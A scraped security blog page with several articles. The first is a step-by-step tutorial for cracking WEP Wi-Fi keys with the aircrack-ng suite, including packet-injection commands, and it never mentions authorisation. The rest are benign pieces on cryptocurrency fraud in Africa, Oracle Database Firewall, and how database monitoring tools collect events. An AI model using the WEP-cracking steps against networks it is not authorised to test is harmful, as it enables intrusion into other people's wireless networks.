Connect with us

Database Security

Hacking WEP Encryption Algorithm

Izunna Okpala



Hacking WEP
  1. Use Linux. Windows cannot sniff WEP packets, but you can use a bootable CD of Linux.
  2. Get a packet-sniffing program. Backtrack is a commonly-used option. Download the iso image and burn it on a bootable CD/DVD.
  3. Boot Linux and Backtrack. Use your bootable CD/DVDs. Note that this operating system is not required to be installed on hard drive. That means whenever you shutdown the Backtrack, all your data will be lost.
  4. Select a start-up option. The following Backtrack screen will show after booting. Change the option with the up and down arrow keys and select one. This tutorial will use the first option.
  5. Load the graphical interface via command base. In this option, Backtrack is started on command base. Type command: startx to continue.
  6. Click on terminal button at the bottom left. It’ll be the fifth option.
  7. Wait for the Linux command terminal to open.
  8. View your WLAN type. Enter the following command: “airmon-ng” (without quotes). You should see something like wlan0 beneath Interface.
  9. Get all the required information for the access point. Enter the following command: “airodump-ng wlan0” (without quotes). You should get three things:
    • BSSID
    • Channel
    • ESSID (AP Name)
    • Here’s what the tutorial case turned up:
      • BSSID 00:17:3F:76:36:6E
      • Channel number 1
      • ESSID(AP Name)Suleman
  10. Enter the following command. This one will use the example information above, but you should plug in your own. Command: “airodump-ng -w wep -c 1  bssid 00:17:3F:76:36:6E wlan0” (without quotes).
  11. Allow setup to start.
  12. Open a new terminal window. Type the following command, substituting the values for your own BSSID, Channel and ESSID. Command: “aireplay-ng -1 0 –a 00:17:3f:76:36:6E wlan0” (without quotes).
  13. Open another new terminal window. Type the following command:
    "aireplay-ng -3 –b 00:17:3f:76:36:6e wlan0 (without quotes)"
  14. Allow setup to start.
  15. Go back to the first terminal window.
  16. Allow the data in this window to reach to 30000 or above. It will take 15 to 60 minutes (or more) depending on wireless signal, hardware and load on access point.
  17. Go to the third terminal window and press Ctrl + c.
  18. Pull up the directories. Type the following command: “dir” (without quotes). This will show the directories saved on it during decrypting.
  19. Use a cap file. For the example, it would be the following: “aircrack-ng web-02.cap” (without quotes). The setup shown below will start.
  20. Break the WEP encrypted key. After this setup completes, you’ll be able to break the key. In this example, it was {ADA2D18D2E}.
Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Database Security

The proliferation of Digital currencies in Africa calls for stronger security measures

Izunna Okpala



The advantages of cryptocurrencies in Africa are also being exploited as cyber criminals become increasingly technically skilled.

Virtual currency related crime has increased in Africa especially in South Africa, with hackers using peoples’ phones according to mine cryptocurrencies. As the popularity of crypto-assets such as bitcoin grows, various agencies have begun the process of reviewing the consumer impact of the crypto-sector and the impact on personal financial security.

Paxful handles more than 50,000 trades a day with three million wallets worldwide, with South Africa being one of its top markets. The fluctuating value of the most popular digital currency in the world has not dissuaded South Africans either as this month Paxful reported a huge 2800 percent increase in South African trades compared to October 2018. Johannesburg, Pretoria, and Cape Town are the country’s three cities contributing to the number of users. Overall, Paxful also noticed that, when compared to the same period, the number of trades across the African continent has risen by 64 percent.

Importance and transparency of increased security

While the vast majority of cryptocurrency trades are secure, the market has not been entirely resistant to scams and fraudulent transactions in recent years. Scammers prey on users who lack the appropriate awareness in this space with the cryptocurrency industry still quite new.

Marius Reitz, South Africa country manager for cryptocurrency wallet Luno, said while cryptocurrencies like Bitcoin were used for illicit activity, the situation is improving as law enforcement agencies get better at tracking transactions, but online scams are still common.

The most popular form of digital currency scams is through phishing, wherein the criminals use a legitimate-looking (but fake) website, email or SMS to trick you into providing password or detailed information said Reitz.

“Bitcoin is secure, but sometimes it’s dangerous how users use it. The users must treat Bitcoin as cash and protect our personal information and passwords just as we do when we use an ATM or shop online. It’s irreversible when your bitcoin is in the possession of hackers and scammers, so it’s important to have the required safeguards in place. “adds Ray Youssef, Paxful’s co-founderand CEO.

On Paxful, users are safe and secured from scammers through various security measures including the escrow service from Paxful which keeps the bitcoin safe until a transaction is completed.

Protecting Your Cryptocurrency Assets

Youssef concludes: “P2P finance is their only hope of financial inclusion and empowerment for more and more people around the world. While the risk of crypto fraud and theft can not be completely eliminated, you can significantly reduce your chances of becoming a target by following Paxful’s top tips for safe trading and taking a few simple precautions.”

Continue Reading

Database Security

Understanding Oracle Database Firewall

Izunna Okpala




Despite what Oracle calls it, this is a Database Activity Monitoring product at its core. Just one with more of a security focus than audit/compliance, and based on network monitoring (it lacks local activity monitoring, which is why it’s weaker for compliance).

  1. Many other DAM products can block, and Secerno can monitor. I always thought it was an interesting product.
  2. Most DAM products include network monitoring as an option. The real difference with Secerno is that they focused far more on the security side of the market, even though historically that segment is much smaller than the audit/monitoring/compliance side. So Oracle has more focus on blocking, and less on capturing and storing all activity.
  3. It is not a substitute for Database Activity Monitoring products, nor is it “better” as Oracle claims. Because it is a form of DAM, but – as mentioned by competitors in the article – you still need multiple local monitoring techniques to handle direct access. Network monitoring alone isn’t enough. I’m sure Oracle Services will be more than happy to connect Secerno and Oracle Audit Vault to do this for you.
  4. Secerno basically whitelists queries (automatically) and can block unexpected activity. This appears to be pretty effective for database attacks, although I haven’t talked to any pen testers who have gone up against it. (They do also blacklist, but the whitelist is the main secret sauce).
  5. Secerno had the F5 partnership before the Oracle acquisition. It allowed you to set WAF rules based on something detected in the database (e.g., block a signature or host IP). I’m not sure if they have expanded this post-acquisition. Imperva is the only other vendor that I know of to integrate DAM/WAF.
  6. Oracle generally believes that if you don’t use their products your are either a certified idiot or criminally negligent. Neither is true, and while this is a good product I still recommend you look at all the major competitors to see what fits you best. Ignore the marketing claims.
  7. Odds are your DBA will buy this when you aren’t looking, as part of some bundle deal. If you think you need DAM for security, compliance, or both… start an assessment process or talk to them before you get a call one day to start handling incidents.

In other words: a good product with advantages and disadvantages, just like anything else. More security than compliance, but like many DAM tools it offers some of both. Ignore the hype, figure out your needs, and evaluate to figure out which tool fits best. You aren’t a bad person if you don’t buy Oracle, no matter what your sales rep tells your CIO.

And seriously – watch out for the deal bundling. If you haven’t learned anything from us about database security by now, hopefully you at least realize that DBAs and security don’t always talk as much as they should (the same goes for Guardium/IBM). If you need to be involved in any database security, start talking to the DBAs now, before it’s too late.

Continue Reading

Database Security

Understanding and Selecting DSP: Data and Event Collection

Izunna Okpala



The evolution of DAM has been framed by these different methods of data collection. That’s important, because what you can do is highly dependent on the data you can collect.

One of its central aspects is the evolution of event collection mechanisms from native audit, to monitoring network activity, to agent-based activity monitoring. These are all database-specific information sources. The evolution of DAM has been framed by these different methods of data collection. That’s important, because what you can do is highly dependent on the data you can collect. For example, the big reason agents are the dominant collection model is that you need them to monitor administrators – network monitoring can’t do that (and is quite difficult in distributed environments).

The development of DAM into DSP also entails examination of a broader set of application-related events. By augmenting the data collection agents we can examine other applications in addition to databases – even including file activity. This means that it has become possible to monitor SAP and Oracle application events – in real time. It’s possible to monitor user activity in a Microsoft SharePoint environment, regardless of how data is stored. We can even monitor file-based non-relational databases. We can perform OS, application, and database assessments through the same system.

A slight increase in the scope of data collection means much broader application-layer support. Not that you necessarily need it – sometimes you want a narrow database focus, while other times you will need to cast a wider net. We will describe all the options to help you decide which best meets your needs.

Let’s take a look at some of the core data collection methods used by customers today:

Event Sources

Local OS/Protocol Stack Agents: A software ‘agent’ is installed on the database server to capture SQL statements as they are sent to the databases. The events captured are returned to the remote Database Security Platform. Events may optionally be inspected locally by the agent for real-time analysis and response. The agents are either deployed into the host’s network protocol stack or embedded into the operating system, to capture communications to and from the database. They see all external SQL queries sent to the database, including their parameters, as well as query results. Most critically, they should capture administrative activity from the console that does not come through normal network connections. Some agents provide an option to block malicious activity – either by dropping the query rather than transmitting it to the database, or by resetting the suspect user’s database connection.

Most agents embed into the OS in order to gain full session visibility, and so require a system reboot during installation. Early implementations struggled with reliability and platform support problems, causing system hangs, but these issues are now fortunately rare. Current implementations tend to be reliable, with low overhead and good visibility into database activity. Agents are a basic requirement for any DSP solution, as they are a relatively low-impact way of capturing all SQL statements – including those originating from the console and arriving via encrypted network connections.

Performance impact these days is very limited, but you will still want to test before deploying into production.

Network Monitoring: An exceptionally low-impact method of monitoring SQL statements sent to the database. By monitoring the subnet (via network mirror ports or taps) statements intended for a database platform are ‘sniffed’ directly from the network. This method captures the original statement, the parameters, the returned status code, and any data returned as part of the query operation. All collected events are returned to a server for analysis. Network monitoring has the least impact on the database platform and remains popular for monitoring less critical databases, where capturing console activity is not required.

Lately the line between network monitoring capabilities and local agents has blurred. Network monitoring is now commonly deployed via a local agent monitoring network traffic on the database server itself, thereby enabling monitoring of encrypted traffic. Some of these ‘network’ monitors still miss console activity – specifically privileged user activity. On a positive note, installation as a user process does not require a system reboot or cause adverse system-wide side effects if the monitor crashes unexpectedly. Users still need to verify that the monitor is collecting database response codes, and should determine exactly which local events are captured, during the evaluation process.

Memory Scanning: Memory scanners read the active memory structures of a database engine, monitoring new queries as they are processed. Deployed as an agent on the database platform, the memory scanning agent activates at pre-determined intervals to scan for SQL statements. Most memory scanners immediately analyze queries for policy violations – even blocking malicious queries – before returning results to a central management server. There are numerous advantages to memory scanning, as these tools see every database operation, including all stored procedure execution. Additionally, they do not interfere with database operations.

You’ll need to be careful when selecting a memory scanning product – the quality of the various products varies. Most vendors only support memory scanning on select Oracle platforms – and do not support IBM, Microsoft, or Sybase. Some vendors don’t capture query variables – only the query structure – limiting the usefulness of their data. And some vendors still struggle with performance, occasionally missing queries. But other memory scanners are excellent enterprise-ready options for monitoring events and enforcing policy.

Database Audit Logs: Database Audit Logs are still commonly used to collect database events. Most databases have native auditing features built in; they can be configured to generate an audit trail that includes system events, transactional events, user events, and other data definitions not available from any other sources. The stream of data is typically sent to one or more locations assigned by the database platform, either in a file or within the database itself. Logging can be implemented through an agent, or logs can be queried remotely from the DSP platform using SQL.

Audit logs are preferred by some organization because they provide a series of database events from the perspective of the database. The audit trail reconciles database rollbacks, errors, and uncommitted statements – producing an accurate representation of changes made. But the downsides are equally serious. Historically, audit performance was horrible. While the database vendors have improved audit performance and capabilities, and DSP vendors provide great advice for tuning audit trails, bias against native auditing persists. And frankly, it’s easy to mess up audit configurations. Additionally, the audit trail is not really intended to collect SELECT statements – viewing data – but focused on changes to data or the database system. Finally, as the audit trail is stored and managed on the database platform, it competes heavily for database resources – much more than other data collection methods. But given the accuracy of this data, and its ability to collect internal database events not available to network and OS agent options, audit remains a viable – if not essential – event collection option.

One advantage of using a DSP tool in conjunction with native logs is that it is easier to securely monitor administrator activity. Admins can normally disable or modify audit logs, but a DSP tool may mitigate this risk.

Discovery and Assessment Sources

Network Scans: Most DSP platforms offer database discovery capabilities, either through passive network monitoring for SQL activity or through active TCP scans of open database ports. Additionally, most customers use remote credentialed scanning of internal database structures for data discovery, user entitlement reporting, and configuration assessment. None of these capabilities are new, but remote scanning with read-only user credentials is the the standard data collection method for preventative security controls.

There are many more methods of gathering data and events, but we’re focusing on the most commonly used. If you are interested in a more depth on the available options, our blog post on Database Activity Monitoring & Event Collection Options provides much greater detail. For those of you who follow our stuff on a regular basis, there’s not a lot of new information there.

Expanded Collection Sources

A couple new features broaden the focus of DAM. Here’s what’s new:

File Activity Monitoring: One of the most intriguing recent changes in event monitoring has been the collection of file activity. File Activity Monitoring (FAM) collects all file activity (read, create, edit, delete, etc.) from local file systems and network file shares, analyzes the activity, and – just like DAM – alerts on policy violations. FAM is deployed through a local agent, collecting user actions as they are sent to the operating system. File monitors cross reference requests against Identity and Access Management (e.g., LDAP and Active Directory) to look up user identities. Policies for security and compliance can then be implemented on a group or per-user basis.

This evolution is important for two reasons. The first is that document and data management systems are moving away from strictly relational databases as the storage engine of choice. Microsoft SharePoint, mentioned above, is a hybrid of file management and relational data storage. FAM provides a means to monitor document usage and alert on policy violations. Some customers need to address compliance and security issues consistently, and don’t want to differentiate based on the idiosyncrasies of underlying storage engines, so FAM event collection offers consistent data usage monitoring.

Another interesting aspect of FAM is that most of the databases used for Big Data are non-relational file-based data stores. Data elements are self-describing and self-indexing files. FAM provides the basic capabilities of file event collection and analysis, and we anticipate the extension of these capabilities to cover non-relational databases. While no DSP vendor offers true NoSQL monitoring today, the necessary capabilities are available in FAM solutions.

Application Monitoring: Databases are used to store application data and persist application state. It’s almost impossible to find a database not serving an application, and equally difficult to find an application that does not use a database. As a result monitoring the database is often considered sufficient to understand application activity. However most of you in IT know database monitoring is actually inadequate for this purpose. Applications use hundreds of database queries to support generic forms, connect to databases with generic service accounts, and/or uses native application codes to call embedded stored procedures rather than direct SQL queries. Their activity may be too generic, or inaccessible to traditional Database Activity Monitoring solutions. We now see agents designed and deployed specifically to collect application events, rather than database events. For example SAP transaction codes can be decoded, associated with a specific application user, and then analyzed for policy violations. As with FAM, much of the value comes from better linking of user identity to activities. But extending scope to embrace the application layer directly provides better visibility into application usage and enables more granular policy enforcement.

This article has focused on event collection for monitoring activity.

Continue Reading